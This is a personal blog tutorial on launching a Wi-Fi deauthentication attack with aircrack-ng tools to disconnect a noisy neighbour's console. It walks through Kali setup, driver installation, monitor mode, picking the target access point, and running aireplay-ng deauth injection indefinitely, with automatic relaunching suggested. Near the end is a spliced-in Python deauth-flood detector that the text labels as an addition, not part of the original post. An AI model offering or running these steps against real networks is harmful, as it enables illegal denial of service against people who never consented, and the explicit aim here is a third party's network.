A few weeks ago, a friend of mine reached out to me asking “What could he do?” regarding an extremely noisy neighbor who spends every night, all night long, playing video games and shouting loudly and angrily at the console. He shouts so loudly that he doesn't let anybody sleep. LoL.
My first thought was to use a jammer device to inhibit the Wi-Fi signal during the night, and hopefully prevent the noisy neighbor from being able to play online. However, jammers are not easy to purchase due to legal reasons. While it’s possible to build them at home, I opted for an easier, old-school alternative: a simple Wi-Fi DeAuth Attack.
I’m writing this little guide for my friend and for educational purposes for you. Feel free to experiment with your own network ;)
REQUIREMENTS
I will use an Apple MacBook with an M1 chip because that’s my friend's notebook. However, we cannot inject network packets directly from macOS, so I will quickly spin up a Kali VM using UTM. I recommend UTM instead of VMware or VirtualBox for Apple's M* chips.
UTM for macOS: https://mac.getutm.app
Kali .iso file for Arm64 (M chip): https://cdimage.kali.org/kali-2023.3/kali-linux-2023.3-installer-arm64.iso
(you can always check for the latest release at the official page)
Tutorial to run Kali on UTM: https://www.kali.org/docs/virtualization/install-utm-guest-vm/.
If you don’t have a MacBook, even better; run your favorite Linux distribution on your notebook and install the aircrack-ng suite :)
Another requirement is to have a Wi-Fi interface with a chipset that supports packet injection. I recommend an Alfa or the classic TP-LINK WN722N.
DRIVERS INSTALLATION
Once you have the Kali VM (or the aircrack-ng installation) ready, you will likely need to install the drivers for the RTL8812AU chipset (Alfa) or RTL8188EUS chipset (TP-LINK).
How do you know if you need the drivers? Connect your Wi-Fi interface to your VM or notebook via USB, and run the iwconfig command. If you don’t see a wlan0 or any wireless interface in the output, then unfortunately, you need to install the drivers.
Note: If you are using UTM, please make sure to allow the USB interface at the top right corner of the view.
Kali will likely still not detect your Wi-Fi interface.
So, let’s install the drivers. The installation procedure is nearly identical for both cases.
Steps for the RTL8188EUS (TP-LINK):
$ git clone https://github.com/aircrack-ng/rtl8188eus
$ cd rtl8188eus
$ make && sudo make install
$ reboot
Steps for the RTL8812AU (Alfa):
$ sudo apt-get install dkms
$ git clone -b v5.6.4.2 https://github.com/aircrack-ng/rtl8812au.git
$ cd rtl*
$ sudo make dkms_install
$ reboot
After the reboot, if we run the iwconfig command again, we should now be able to see the wireless interface, yay!
WI-FI DEAUTH ATTACK
So, we are now ready for action! The idea is to execute a Wi-Fi deauth attack against the target network. This will disconnect all devices connected to it, including the computer or video game console.
First of all, let's put our Wi-Fi interface into monitor mode.
$ sudo airmon-ng check kill
$ sudo airmon-ng start wlan0
Now, let's gather the necessary information from our target network.
$ sudo airodump-ng wlan0
The output will look as follows:
Basically, we can observe:
BSSID: MAC address of the Access Point
PWR: Signal level; in simple terms, it’s the distance from the Access Point
CH: Wi-Fi channel
ESSID: Access Point name
For a successful packet injection attack, the distance from the targeted access point is critical: the closer, the better. How can you determine if you are close or far away? Observe the PWR information; the closer the number is to zero, the closer you are to the access point. In the picture above, I will target the access point with a PWR of -41, as it’s my router and the closest to me.
Let's go! Execute the deauth packet injection attack as follows:
$ sudo aireplay-ng --deauth 0 -a {{TARGET_BSSID}} wlan0
If it's working, you will see in the output that aireplay-ng is successfully injecting packets. Note that the above command will deauthenticate all the devices connected to the target network.
While we let that run, devices should not be able to reconnect to the Wi-Fi. If that’s not the case, you can always automate the re-launch of the command every few minutes ;)
Note: In case you encounter the following error:
It seems aireplay-ng is attempting to inject on the wrong channel. I resolved this by stopping and then restarting the interface in monitor mode, but this time specifying the channel of the target network (you can obtain the channel from the airodump-ng information). Note the '11' at the end of the start command.
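Seen from the defender's side, the traffic this attack produces stands out in a monitor-mode capture as a burst of deauthentication frames for a single BSSID. The following detector is an added example, not part of the original post; the window, the threshold and the sample frames are constructed assumptions, and it expects raw 802.11 frames with any radiotap header already stripped.

```python
import struct
from collections import defaultdict, deque

DEAUTH, DISASSOC = 0xC0, 0xA0   # frame-control byte 0: management type, subtype 12 / 10
BROADCAST = "ff:ff:ff:ff:ff:ff"

def mac(b):
    return ":".join(f"{x:02x}" for x in b)

def parse_deauth(frame):
    """Return (dest, source, bssid, reason) for a deauth/disassoc frame, else None."""
    if len(frame) < 26 or frame[0] not in (DEAUTH, DISASSOC):
        return None
    # Management header: FC(2) duration(2) addr1(6) addr2(6) addr3(6) seq(2), then reason(2)
    dest, src, bssid = mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22])
    (reason,) = struct.unpack_from("<H", frame, 24)
    return dest, src, bssid, reason

def detect_floods(capture, window=10.0, threshold=20):
    """capture: iterable of (timestamp_seconds, frame_bytes) in time order.
    Returns {bssid: {"peak": n, "broadcast": m}} for each BSSID that saw at least
    `threshold` frames within `window` seconds; m counts broadcast-addressed ones so far."""
    recent = defaultdict(deque)      # bssid -> timestamps still inside the window
    broadcast = defaultdict(int)
    alerts = {}
    for ts, frame in capture:
        parsed = parse_deauth(frame)
        if parsed is None:
            continue
        dest, _src, bssid, _reason = parsed
        q = recent[bssid]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        broadcast[bssid] += dest == BROADCAST
        if len(q) >= threshold:
            peak = max(len(q), alerts.get(bssid, {}).get("peak", 0))
            alerts[bssid] = {"peak": peak, "broadcast": broadcast[bssid]}
    return alerts

def build_frame(subtype, dest, bssid, reason=7):
    """Constructed sample frame for the demo (not captured traffic)."""
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    hdr = bytes([subtype, 0, 0, 0]) + raw(dest) + raw(bssid) + raw(bssid)
    return hdr + b"\x00\x00" + struct.pack("<H", reason)

if __name__ == "__main__":
    ap = "02:00:00:aa:bb:01"         # constructed, locally administered address
    flood = [(i * 0.1, build_frame(DEAUTH, BROADCAST, ap)) for i in range(64)]
    print(detect_floods(flood))
```

Networks that enable Protected Management Frames (802.11w, required by WPA3) have clients discard unauthenticated deauthentication frames, so an alert from a detector like this is also a prompt to check whether PMF is turned on.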
That's all! I want to thank my friend for taking me back to the past for a while. It's been so long since I last engaged in this basic Wi-Fi 101 hacking stuff, and I had a lot of fun ;)
Thank you for reading.
Sheila A. Berta (@UnaPibaGeek)